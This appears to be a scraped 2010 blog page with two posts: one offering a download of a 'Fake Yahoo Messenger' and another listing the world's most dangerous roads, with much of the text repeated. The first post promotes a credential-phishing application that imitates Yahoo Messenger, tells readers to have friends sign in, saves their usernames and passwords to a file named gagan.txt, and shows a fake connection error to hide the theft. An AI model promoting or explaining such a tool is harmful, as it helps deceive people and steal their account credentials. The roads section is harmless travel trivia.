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Thursday, October 21, 2010
Wednesday, October 20, 2010
Fake Yahoo Messenger
This application stores all the username and passwords entered in it.
Screenshot :
How to use:
This application looks same as Yahoo Messenger. Just install in your PC and tell your friend to sign into Yahoo. When his/her will enter his username and password and clicks Sign In, all the account details will get save in your C drive with name gagan.txt. Just open this file and you can see his/her account details.
Note : When someone clicks on Sign In a fake error will come that port 80 error, check your Internet connection and try again.
Download Instructions :
Click here to download ( Mediafire link)
or
Click here to download ( Rapidshare Link)
Screenshot :
How to use:
This application looks same as Yahoo Messenger. Just install in your PC and tell your friend to sign into Yahoo. When his/her will enter his username and password and clicks Sign In, all the account details will get save in your C drive with name gagan.txt. Just open this file and you can see his/her account details.
Note : When someone clicks on Sign In a fake error will come that port 80 error, check your Internet connection and try again.
Download Instructions :
Click here to download ( Mediafire link)
or
Click here to download ( Rapidshare Link)
Thursday, October 14, 2010
World’s most dangerous Roads Pictures
World Record Pictures
Location: Through the vast deserts of Western Australia
Fear factor: Cattlemen 100 years ago pushed this 1,100-mile route through the endless deserts of Down Under, digging more than 50 wells along its length. Recreational four-wheel-drive convoys can now cross the desolation with the aid of fuel drops, forging endless sand and sun-baked earth to traverse one of the least inhabitable places on the planet.
Location: Through the vast deserts of Western Australia
Fear factor: Cattlemen 100 years ago pushed this 1,100-mile route through the endless deserts of Down Under, digging more than 50 wells along its length. Recreational four-wheel-drive convoys can now cross the desolation with the aid of fuel drops, forging endless sand and sun-baked earth to traverse one of the least inhabitable places on the planet.
The Stilwell Road, India and Burma
Location: Jungle route from Ledo, India into Burma
Fear factor: Built during World War II at the cost of thousands of lives, the Stilwell Road (aka The Ledo Road) climbs mountain passes, snakes through the jungle, and crosses more than 100 rivers and streams in its 1,079-mile length. Constructed as a supply route by Western Allies, the road today is returning to jungle, little used and inaccessible for much of its length behind Burma’s totalitarian curtain.
Location: Jungle route from Ledo, India into Burma
Graciosa Trail, Brazil
Location: In the mountains above Morretes
Halsema Highway, Philippines
Location: Island of Luzon
Fear factor: Like many under-maintained mountain roads, landslides are a hazard on the Halsema Highway, where big stones and debris tumble from peaks. And along with the cloud forests comes mist that can ruin visibility. Tracing a circuitous path, this road crosses the massive Cordillera Central mountain range on the Island of Luzon, and many sections remain unpaved.
Location: Island of Luzon
Fear factor: Like many under-maintained mountain roads, landslides are a hazard on the Halsema Highway, where big stones and debris tumble from peaks. And along with the cloud forests comes mist that can ruin visibility. Tracing a circuitous path, this road crosses the massive Cordillera Central mountain range on the Island of Luzon, and many sections remain unpaved.
Guoliang Tunnel Road, China
Location: China’s Taihang Mountains
Fear factor: Let’s just say its name translates to the “Road that does not tolerate any mistakes.” In 1972, villagers in a remote area of the Taihang Mountains chiseled a 3/4-mile-long tunnel through a mountain for access to the outside world. Today, the route—15 feet high and 12 feet wide—is a tight squeeze for vehicles, twisting past the tunnel’s 30 “windows,” which provide views off the precipice to a tumbling abyss hundreds of feet below.
Location: China’s Taihang Mountains
Fear factor: Let’s just say its name translates to the “Road that does not tolerate any mistakes.” In 1972, villagers in a remote area of the Taihang Mountains chiseled a 3/4-mile-long tunnel through a mountain for access to the outside world. Today, the route—15 feet high and 12 feet wide—is a tight squeeze for vehicles, twisting past the tunnel’s 30 “windows,” which provide views off the precipice to a tumbling abyss hundreds of feet below.
North Yungas Road, Bolivia
Location: Between La Paz and the town of Coroico
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